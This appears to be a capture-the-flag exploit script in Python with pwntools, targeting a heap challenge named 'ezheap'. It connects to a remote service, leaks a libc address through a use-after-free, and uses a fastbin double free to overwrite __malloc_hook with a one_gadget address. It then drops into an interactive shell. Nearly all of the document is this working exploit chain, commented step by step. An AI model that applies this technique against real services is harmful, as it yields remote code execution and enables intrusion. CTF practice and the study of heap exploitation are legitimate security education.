pwn-ezheap(uaf+doublefree)

from pwn import *
from LibcSearcher import *
def conn():
    """Populate the module globals used by the menu helpers.

    Loads the libc image this write-up was solved against and opens the
    remote challenge connection; ``elf`` is declared global but, as in the
    original, only the commented-out local setup would assign it.
    """
    global r, Libc, elf
    libc_path = "./libc-2.23.so"
    # Local alternative kept from the original write-up:
    # r = process("./pwn14")
    # elf = ELF("./pwn1")
    Libc = ELF(libc_path)
    r = remote("1.95.36.136", 2136)
def add(x,y):
    """Select menu option 1, then answer the index and size prompts with x and y."""
    index = str(x).encode()
    size = str(y).encode()
    r.sendlineafter(b"choice:\n", b"1")
    r.sendlineafter(b"index:\n", index)
    r.sendlineafter(b"size:\n", size)
def edit(x,y):
    """Select menu option 3 and send slot x, the byte length of y, then y itself.

    y must be bytes; its length is computed before any prompt is answered.
    """
    exchange = (
        (b"choice:\n", b"3"),
        (b"index:\n", str(x).encode()),
        (b"length:\n", str(len(y)).encode()),
        (b"content:\n", y),
    )
    for prompt, answer in exchange:
        r.sendlineafter(prompt, answer)
def free(x):
    """Select menu option 2 and answer the index prompt with x."""
    index = str(x).encode()
    for prompt, answer in ((b"choice:\n", b"2"), (b"index:\n", index)):
        r.sendlineafter(prompt, answer)
def show(x):
    """Select menu option 4 and answer the index prompt with x."""
    index = str(x).encode()
    for prompt, answer in ((b"choice:\n", b"4"), (b"index:\n", index)):
        r.sendlineafter(prompt, answer)
def pwn():
    """Drive the remote menu through the write-up's leak and overwrite sequence.

    Uses the module globals ``r`` and ``Libc`` set up by conn().  Every
    numeric constant below (the leak adjustment 3951480, the hook offset
    0x23, the one_gadget list) is specific to the libc-2.23 build loaded in
    conn(); against any other build the values must be re-derived.
    """
    # Stage 1: allocate, free and re-allocate slot 0, then show it; the
    # line the program prints is read back as the leak.
    add(0,0x1000)
    add(1,0x10)
    free(0)
    add(0,0x1000)
    show(0)
    # recvline() keeps the trailing newline, hence [:-1]; the bytes are
    # zero-padded to 8 and decoded with u64.  NOTE(review): 3951480 is a
    # hard-coded build-specific distance to the libc base, not taken from
    # Libc.sym, so a wrong libc file fails silently with a bad base.
    libc = u64(r.recvline()[:-1].ljust(8,b"\x00"))-3951480
    print("libc>>>",hex(libc))
    # Stage 2: two 0x68-byte slots; slot 0 is freed twice with slot 1 freed
    # in between (the double free named in the title).
    add(0,0x68)
    add(1,0x68)
    free(0)
    free(1)
    free(0)
    add(0,0x68)
    # Address written into slot 0 is __malloc_hook (from the libc symbol
    # table) minus a fixed 0x23.
    malloc = libc + Libc.sym["__malloc_hook"]
    edit(0,p64(malloc-0x23))
    add(1,0x68)
    add(2,0x68)
    add(3,0x68)
    # Candidate one_gadget offsets for this libc build; only one[1] is used.
    one = [0x4527a,0xf03a4,0xf1247]
    onegadget = libc+one[1]
    edit(3,b"\x00"*(0x13)+p64(onegadget)+b'\x00'*8)     #onegadget -> relloc_hook
    print("onegadget>>>",hex(onegadget))
    # One more allocation request, then the connection is handed to the
    # user; presumably this request is what reaches the overwritten hook.
    add(4,0)
    #gdb.attach(r)
    r.interactive()
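# Guard the entry point so importing this file for its menu helpers does
# not open the remote connection as a side effect.
if __name__ == "__main__":
    conn()
    pwn()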

